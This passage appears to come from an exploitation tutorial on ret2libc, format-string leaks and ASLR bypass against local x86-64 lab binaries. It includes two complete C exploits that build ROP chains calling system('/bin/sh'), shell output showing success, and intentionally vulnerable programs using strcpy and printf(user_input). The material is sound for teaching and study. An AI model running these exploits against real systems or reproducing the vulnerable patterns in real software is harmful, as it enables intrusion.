A note on calling conventions & stack layout (why addresses matter)

On 32-bit x86 the called function looks for its arguments on the stack, while on x86‑64 (System V ABI) the first argument is passed in the RDI register. So if you hijack control flow you must arrange for the right argument pointer to be where system() expects it. That’s why finding both system()’s address and a reliable pointer to "/bin/sh" matters.
Also remember architecture/ABI differences (32-bit vs 64-bit) and endianness when you’re working with raw addresses.

So the exploit would look something like this (exploit.c):

/* gcc -o exploit exploit.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>

uint64_t get_egg(void) {
  char * egg = getenv("EGG");
  if (!egg) {
    fprintf(stderr, "[-] EGG not set\n");
    exit(1);
  }
  printf("[+] EGG hatched at: 0x%016lx\n", (unsigned long) egg);
  return (uint64_t)(unsigned long) egg;
}

/* write 64-bit little-endian into buffer */
void to_le64(uint64_t val, unsigned char * buf) {
  buf[0] = (val >> 0) & 0xFF;
  buf[1] = (val >> 8) & 0xFF;
  buf[2] = (val >> 16) & 0xFF;
  buf[3] = (val >> 24) & 0xFF;
  buf[4] = (val >> 32) & 0xFF;
  buf[5] = (val >> 40) & 0xFF;
  buf[6] = (val >> 48) & 0xFF;
  buf[7] = (val >> 56) & 0xFF;
}

int main(void) {
  /* make sure EGG contains the string we will point at */
  setenv("EGG", "/bin/sh", 1);

  uint64_t pop_rdi_ret = 0x00000000004007c3ULL;
  uint64_t system_addr = 0x00007ffff7a33450ULL;
  uint64_t exit_addr = 0x00007ffff7a05e10ULL;

  uint64_t binsh_addr = get_egg(); /* "/bin/sh" in env */

  /* offset discovered with cyclic pattern */
  const int offset = 152; /* bytes until saved RIP */

  /*
     [ padding (offset bytes) ]
     [ pop_rdi_ret (8) ]
     [ binsh_addr  (8) ]
     [ system_addr (8) ]
     [ exit_addr   (8) ]
  */
  const int words = 4; /* pop_rdi, binsh, system, exit */
  const int size = offset + 8 * words;

  printf("[+] Offset to RIP: %d bytes\n", offset);
  printf("    pop_rdi; ret @ 0x%016lx\n", (unsigned long) pop_rdi_ret);
  printf("    system()      @ 0x%016lx\n", (unsigned long) system_addr);
  printf("    exit()        @ 0x%016lx\n", (unsigned long) exit_addr);
  printf("    \"/bin/sh\"    @ 0x%016lx\n", (unsigned long) binsh_addr);

  unsigned char * buf = malloc(size + 1); /* +1 for the terminating NUL */
  if (!buf) {
    perror("malloc");
    return 1;
  }
  buf[size] = '\0'; /* argv strings must be NUL-terminated */

  /* fill padding */
  memset(buf, 0x41, offset); /* 'A' */

  /* chain (little-endian 64-bit writes) */
  to_le64(pop_rdi_ret, buf + offset);
  to_le64(binsh_addr, buf + offset + 8);
  to_le64(system_addr, buf + offset + 16);
  to_le64(exit_addr, buf + offset + 24);

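  char * args[] = {
    "./f00",
    (char * ) buf,
    NULL
  };

  /* pass our environment along so EGG exists in the target too;
     its address there can still differ a little from the one printed above */
  extern char **environ;
  execve("./f00", args, environ);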

  /* execve returns only on error */
  perror("execve");
  free(buf);
  return 1;
}

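We hard‑code addresses into the payload, and remember: ASLR scrambles addresses and blows this trick up. That’s why this only works when ASLR (and the other mitigations) are off. One more caveat: these 64-bit addresses contain zero bytes, and both argv strings and strcpy() stop at the first NUL, so a multi-address chain like this only arrives intact through an input path that tolerates NUL bytes (for example read() or fgets()).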

It’s old‑school: ret-style attacks were all the rage back in the day, but nowadays they’re a pain unless you’re hitting a really ancient box or a sloppy misconfiguration. In our case we flipped the mitigations off, so the dumb, simple technique actually works; otherwise it’d just crash and burn.

— ASLR and info leaks —

Alright, we’ve been playing on easy mode. How can we defeat NX and ASLR? How does that usually work, and why? What do we need for such an exploit? Format strings are one answer. Most people think an information leak is harmless, and there’s some truth to that on its own, but leaks can provide a lot of critical information. Let’s see how: time to write an exploit that defeats stack canaries, the NX bit, and ASLR.

So what is a format-string vulnerability? This vuln can be used to read or write memory (and, combined with other primitives, lead to code execution). The root problem is passing unchecked user input as the format parameter to formatting functions. Different specifiers behave differently and this matters for exploitation:

%x / %p: print values from the argument slots (formatted as hex / pointer); on x86‑64 the first few come from registers and the rest are read straight off the stack.
%s: treat the argument as a pointer and dereference it, printing the pointed-to string (can cause a crash if the pointer is invalid).
%n: writes the number of bytes printed so far to an address taken from the argument list; this is a write primitive.

Using these correctly lets an attacker leak pointers (for ASLR bypass) or perform arbitrary writes (with careful control of positional parameters and widths).

The format string is the control parameter used by printf-family functions in stdio.h. The format string specifies how to render subsequent arguments into text. By default the result is printed to stdout.

Alright, take a look at this:

printf("Name: %s, Age: %d\n", "Lena", 25);

%s - string (expects a char * argument and dereferences it)
%c - single character
%d - signed integer
%f - floating-point
%p - pointer (prints an address)

Each % in the format string consumes a corresponding argument from the variadic argument list. In the example above there are two specifiers (%s and %d) and two corresponding arguments. The vulnerability appears when user input is passed as the format string itself, because printf will then interpret user-controlled specifiers and pull arbitrary data from the stack (or write via %n).

char input[100];
fgets(input, sizeof input, stdin);
printf(input);   // user controls the format string

See? printf expects a format string, but we’re passing user input directly. If someone enters something like %x %x %x %x, printf will read data off the stack and leak memory values. It can even write to memory using %n, which can lead to code execution.

We’ve got the same vulnerable program, but now there’s a new twist: a format string bug right after the buffer overflow.

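#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char buffer[64];

    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }

    strcpy(buffer, argv[1]);  // no bounds check: stack buffer overflow
    printf(buffer);           // user input used as the format: format string bug
    printf("\n");

    return 0;
}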

This printf(buffer) is our golden ticket. It demonstrates a powerful technique: using a leaked libc address (or a leaked GOT entry pointing into libc) to bypass ASLR, compute libc base, and construct a successful ret2libc or ROP-assisted ret2libc attack.

First, the binary’s protections:

    Arch:       amd64-64-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX enabled  
    PIE:        No PIE (0x400000)

NX is enabled, so injected shellcode on the stack is not executable. But PIE is disabled, meaning the main binary’s addresses (including GOT) are fixed. The wildcard is ASLR, which randomizes libc/stack/heap base addresses each run.

cat /proc/sys/kernel/randomize_va_space
2

ASLR (Address Space Layout Randomization) randomizes base addresses of shared libraries, stack, heap and other mappings so attackers cannot reliably predict where code/data reside.

The value 2 indicates that full randomization is enabled for ASLR. This randomizes all parts of the memory. Not only the stack but also other memory segments such as shared libraries, heap, memory managed through brk(), and other memory-mapped regions, will be randomized each time a program is executed.

On the other hand, if the value is 1, the stack, the mmap base, the VDSO page and shared libraries are randomized, but the brk()-managed heap is not. This is called partial randomization.

ASLR is easier to defeat on 32-bit systems: the amount of addressable memory is significantly smaller, so ASLR has less entropy to work with. Lower entropy makes it easier to guess or brute-force memory addresses.

However, we have two powerful primitives:

A format string bug to leak addresses from memory.
A stack buffer overflow to hijack execution flow.

ASLR randomizes the base addresses of the stack, heap, and libraries like libc. If you don’t know where system() or the “/bin/sh” string live, you can’t point your hijacked return address to them. It’s like knowing the street address but not the city.

While ASLR randomizes the base address of libc, it does not change the internal layout of the library: the relative offsets between functions and symbols inside a given libc are constant. That is why leaking one libc address allows calculation of other libc addresses for the same libc binary/version.

This gives us a clear path:

Leak a known function’s address: use the format string bug to print a known libc function address (like printf or system).
Calculate the libc base: take the leaked runtime address and subtract the function’s known static offset within libc. The result is the randomized base address of libc for this specific run.
    libc_base = leaked_system_addr - libc_system_offset
Find everything else: now that we know the base, we can calculate the runtime address of any other function or string in libc by adding their static offsets.
    system_runtime = libc_base + system_offset
    binsh_runtime = libc_base + binsh_offset

With these calculated addresses in hand, we can build a precise ret2libc or ROP chain, feeding it into the buffer overflow to finally pop a shell, killin’ ASLR in the process.

The offset to the saved return address is 72 bytes, which matches the 64-byte buffer plus the 8-byte saved RBP.

Let’s leak libc. Now that we know the overflow offset, and NX + ASLR are enabled, use the format string vuln to leak an address. Prefer leaking a GOT entry (printf@GOT or puts@GOT) if PIE is disabled: GOT entries are at fixed binary addresses and point to libc functions at runtime, so leaking a GOT entry gives a direct libc pointer. If you only have stack leaks, ensure the leaked value falls within libc’s address range before using it.

If we leak an address that resides in libc, we can compute libc’s base: libc_base = leaked_addr - known_offset_in_libc. From libc base we derive addresses of system, the "/bin/sh" string, and ROP gadgets.

To identify a leaked address that belongs to the libc, we need to determine the range of addresses available within the libc library. Afterward, we can send multiple format specifiers like %x to extract some values from the stack.

If we come across an address within the libc’s address range while following this process, we can use that leaked address to calculate the libc base. Another approach involves examining the stack before the branch to printf() and identifying an address within the range of the libc base addresses. We will perform this later.

When you change input length the stack layout shifts, so positional specifiers like %N$p will reference different slots. Because the input itself lives on the stack, keeping probing inputs the same length makes positional indices stable while enumerating stack positions.

[ * ] Spraying
0x7fff7ecf942b[stack]
0x7ffcee70d738[stack]
0x7f0070243825[libc]
0x40123d[binary]
0x7f20c92032e8[libc]
0x4011f0[binary]
0x401090[binary]
0x7ffd48deeed0[stack]
0x7f1d881d1620[libc]
0x7ffd4df3cb78[stack]
0x401176[binary]
0x4011f0[binary]
0x401090[binary]
0x7ffdce773400[stack]
0x7ffd6757f9a8[stack]
0x7ffcd2fbf3e0[stack]
0x401090[binary]
0x7ffcfad41240[stack]
0x4010be[binary]
0x7ffeb0b99938[stack]
0x7ffd7d19b424[stack]
0x7fff36aa842a[stack]
0x7ffd554fc430[stack]
0x7ffde4e6e440[stack]
0x7ffc987f2490[stack]
0x7ffe4bb2c4a3[stack]

  ...

0x7f397842e000[libc]
0x401090[binary]
0x7ffe16452c99[stack]
0x7ffff5590ff2[stack]
0x7ffc992e0f99[stack]
  ...

~/pwnme$ ./f00 "%8\$p"
0x7f0070243825 < looks promising

As shown, PIE = No means binary addresses (including GOT) are predictable, while some stack slots and probe positions contain libc pointers (these vary run-to-run under ASLR). Now, we need to calculate the libc base using this leaked address. To achieve this, we must determine the offset between the leaked address and the libc base. This way, the next time the libc address changes, we can use the offset and the leaked address to determine the libc base.

exploit.c

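#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define POP_RDI_RET   0x401253  // ROPgadget --binary ./f00 | grep "pop rdi"
#define RET_GADGET    0x401010  // plain ret, keeps the stack 16-byte aligned
#define SYSTEM_OFFSET 0x52290   // readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep " system"
#define BINSH_OFFSET  0x1b45bd  // offset of the "/bin/sh" string inside libc
#define RET_OFFSET    72        // bytes from buffer start to the saved return address

int main(void) {
  printf("[*] Getting libc leak...\n");

  // Assumes the leak from this first run still applies to the second run,
  // which only holds if libc is mapped at the same base in both.
  FILE *fp = popen("./f00 '%10$llx'", "r");
  if (fp == NULL) {
    perror("popen");
    return 1;
  }
  char leak_str[20] = {0};
  if (fscanf(fp, "%19s", leak_str) != 1) {
    fprintf(stderr, "[-] No leak read\n");
    pclose(fp);
    return 1;
  }
  pclose(fp);

  uint64_t leak = strtoull(leak_str, NULL, 16);
  printf("[+] Leaked: 0x%" PRIx64 "\n", leak);

  // Masking the low 12 bits gives the libc base only when the leaked pointer
  // lies in libc's first page; otherwise subtract its known offset instead.
  uint64_t libc_base = leak & ~0xfffULL;
  uint64_t system_addr = libc_base + SYSTEM_OFFSET;
  uint64_t binsh_addr = libc_base + BINSH_OFFSET;

  printf("[+] Libc base: 0x%" PRIx64 "\n", libc_base);
  printf("[+] system: 0x%" PRIx64 "\n", system_addr);
  printf("[+] /bin/sh: 0x%" PRIx64 "\n", binsh_addr);

  // Build payload: padding up to the saved return address, then the chain
  char payload[200] = {0};
  memset(payload, 'A', RET_OFFSET);

  // ROP chain (memcpy avoids type-punned stores into the char buffer)
  uint64_t rop[] = {
    POP_RDI_RET,  // pop rdi; ret
    binsh_addr,   // /bin/sh string
    RET_GADGET,   // stack alignment
    system_addr   // system()
  };
  memcpy(payload + RET_OFFSET, rop, sizeof rop);

  printf("[*] ROP chain: pop_rdi -> /bin/sh -> ret -> system\n");

  // argv strings are NUL-terminated, so the target only receives the
  // payload up to its first zero byte.
  char *argv[] = {
    "./f00",
    payload,
    NULL
  };
  execve("./f00", argv, NULL);

  perror("execve");
  return 1;
}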

For the ROP chain in the exploit, I used https://github.com/JonathanSalwan/ROPgadget to find the necessary gadgets in the binary.

Let’s try it:

~/pwnme$ ./exploit 
[*] Getting libc leak...
[+] Leaked: 0x7f85c1d1e2e8
[+] Libc base: 0x7f85c1d1e000
[+] system: 0x7f85c1d70290
[+] /bin/sh: 0x7f85c1ed25bd
[*] ROP chain: pop_rdi -> /bin/sh -> ret -> system
$ 

And just like that, bingo!! We have our shell.

Before we end, here’s a simple challenge for you to solve. Here’s the source code. It’s similar to what we had before, but with a naive twist that you need to bypass.

#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdlib.h>

char * s_input(const char * input) {
  if (input == NULL) return NULL;

  size_t len = strlen(input);
  char * sanitized = malloc(len * 2 + 1);
  if (!sanitized) return NULL;

  int j = 0;
  int in_encoding = 0;
  char hex_buf[3] = {
    0
  };
  int hex_index = 0;

  for (int i = 0; i < len; i++) {
    if (input[i] == '%' && isxdigit(input[i + 1]) && isxdigit(input[i + 2])) {
      hex_buf[0] = input[i + 1];
      hex_buf[1] = input[i + 2];
      int decoded_char = strtol(hex_buf, NULL, 16);

      if (decoded_char == 'n' || decoded_char == 's') {
        i += 2;
        continue;
      }

      sanitized[j++] = (char) decoded_char;
      i += 2;
      continue;
    }

    if (input[i] == '%') {
      sanitized[j++] = '%';
      sanitized[j++] = '%';
      continue;
    }

    if (isalnum(input[i]) || input[i] == ' ' || input[i] == '_' || input[i] == '-') {
      sanitized[j++] = input[i];
    } else {
      sprintf( & sanitized[j], "%%%02X", (unsigned char) input[i]);
      j += 3;
    }
  }
  sanitized[j] = '\0';
  return sanitized;
}

void audit(const char * user_action,
  const char * details) {
  char log_buffer[256];
  snprintf(log_buffer, sizeof(log_buffer),
    "User action='%s', Details='%s'",
    user_action, details);
  printf(log_buffer);
  printf("\n");
}

void process_request(char * input) {
  char buffer[64];

  printf("Processing...\n");

  char * processed = s_input(input);
  if (!processed)
    return;

  audit(processed, "Processing_request");
  strcpy(buffer, processed);

  printf("Completed: %s\n", buffer);
  free(processed);
}

int main(int argc, char * argv[]) {
  if (argc < 2) {
    printf("Usage: %s <input>\n", argv[0]);
    return 1;
  }

  process_request(argv[1]);
  return 0;
}

Enjoy !!